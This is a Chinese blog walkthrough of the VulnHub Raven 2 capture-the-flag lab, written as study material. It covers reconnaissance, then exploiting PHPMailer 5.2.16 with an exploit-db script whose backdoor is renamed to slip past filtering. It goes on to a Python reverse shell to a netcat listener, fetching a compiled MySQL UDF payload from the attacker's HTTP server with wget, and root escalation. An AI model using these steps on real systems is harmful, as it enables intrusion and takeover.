• vulnhub靶机raven2

    靶机下载地址:https://www.vulnhub.com/entry/raven-2,269/
    Kail ip:192.168.70.129
    靶机ip :192.168.70.160
    因为网络重置后面部分的ip变成了
    Kali:192.168.174.128
    靶机ip:192.168.174.130
    这个靶机主要跟着b站的up主做的,这里附上链接,讲的很棒

    Description Raven 2 is an intermediate level boot2root VM. There are
    four flags to capture. After multiple breaches, Raven Security has
    taken extra steps to harden their web server to prevent hackers from
    getting in.

    一、信息搜集

    靶机ip发现
    命令: sudo arp-scan -l
    在这里插入图片描述

    端口扫描
    命令:sudo nmap -A 192.168.70.160
    在这里插入图片描述

    对网站进行目录扫描
    命令:dirb 192.168.70.160
    在这里插入图片描述

    对扫描出来的目录进行访问,发现信息泄露
    在这里插入图片描述

    在path目录发现flag1
    在这里插入图片描述

    二、漏洞利用

    发现存在phpmailer,并在version中发现版本号5.2.16
    在这里插入图片描述

    搜索即可得到相关漏洞和复现过程,进行漏洞利用
    在这里插入图片描述

    这里选择直接在kali使用searchsploit查找,我们的版本是5.2.16
    在这里插入图片描述

    选择40974.py脚本进行攻击,将searchsploit的文件移动到桌面命令如下:

    cp /usr/share/exploitdb/exploits/php/webapps/40974.py .

    • 1

    (‘.’代表当前目录)
    在这里插入图片描述

    对py脚本进行修改
    在这里插入图片描述

    需要修改的地方又四处

    1. target修改为你的目标网站,这里是http://192.168.174.130/concat.php
    2. 修改后门文件backdoor.php为dayu.php,因为这种敏感词会被拦住
    3. 修改ip为你的靶机ip,这里使用的是python一句话反弹shell,也可以修改为一句话木马,再进行连接也可以
    4. 下面的目录修改为我们在网站上找到的/var/www/html目录,文件为生成的dayu.php
      使用python执行脚本
      在这里插入图片描述

    使用nc进行监听6666端口
    之后访问网站http://192.168.174.130/dayu.php
    即可接收到会话
    进入交互式窗口python -c ‘import pty;pty.spawn(“/bin/bash”)’
    在这里插入图片描述

    进入后先来查找一下flag文件

    find / -name flag*

    • 1

    在这里插入图片描述

    这里找到flag2和flag3
    在这里插入图片描述

    Flag3是图片形式的,我们在浏览器直接访问就行http://192.168.174.130/wordpress/wp-content/uploads/2018/11/flag3.png
    在这里插入图片描述

    三、提权

    还有一个flag4,接下来进行提权
    首先进入到wordpress的目录下,查看config文件,其中发现mysql的账号和密码
    在这里插入图片描述
    在这里插入图片描述

    Mysql登录

    mysql -uroot -pR@v3nSecurity

    • 1

    在这里插入图片描述

    查看wordpress中的user表,尝试破解,但是没解析出来,这里尝试mysql的udf提权

    udf = 'user defined function’即‘用户自定义函数’。
    通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。
    udf在mysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写。

    提权思路
    • 将udf文件放到指定位置(Mysql>5.1放在Mysql根目录的lib\plugin文件夹下)
    • 从udf文件中引入自定义函数(user defined function)
    • 执行自定义函数

    查看是否满足写入条件
    在这里插入图片描述

    Secure_file_priv为空,满足条件
    在这里插入图片描述

    查看插件目录

    在这里插入图片描述
    在这里插入图片描述

    查看是否能远程登录
    在这里插入图片描述

    这里只允许本地访问,所以不能就不使用msf进行提权了
    在这里插入图片描述

    这里mysql提权的特征都符合,接着去找一下提权的脚本
    在这里插入图片描述

    将1518移动到桌面,接下来对c文件进行编译
    在这里插入图片描述
    编译命令:

    gcc -g -c /home/ycx/Desktop/1518.c
gcc -g -shared -o 1518.so 1518.o -lc

    • 1
    • 2

    python开启http服务

    python -m http.server 8888

    • 1

    靶机的shell终端进行文件下载
    要在/tmp目录下载

    wget http://192.168.174.128:8888/1518.so

    • 1

    在这里插入图片描述

    按照脚本的命令进行提权即可,使用的so文件是我们下载好的,/tmp目录下的1518.so
    在这里插入图片描述

    或者使用find提权

    在这里插入图片描述

    这里使用nc接收反弹shell

    在这里插入图片描述

    在这里插入图片描述

    对/etc/passwd进行写入切换用户也可以提权成功,还是nc反弹简单一些

    在这里插入图片描述

  • 相关阅读:
    MIT 6.828 Lab1(从引导扇区开始)
    LeetCode 70. 爬楼梯
    Vue--Router--动态路由的用法
    建议收藏!Harmony应用配置文件概述(Stage模型)
    二、let 和 const 命令
    CI/CD——Jenkins自动构建maven项目
    java求两个数的百分比
    cpu设计和实现(数据访问)
    vue项目electron打包
    科技云报道:从百度智能云的探索,看懂边缘云的过去和未来
  • 原文地址:https://blog.csdn.net/weixin_52450702/article/details/127811079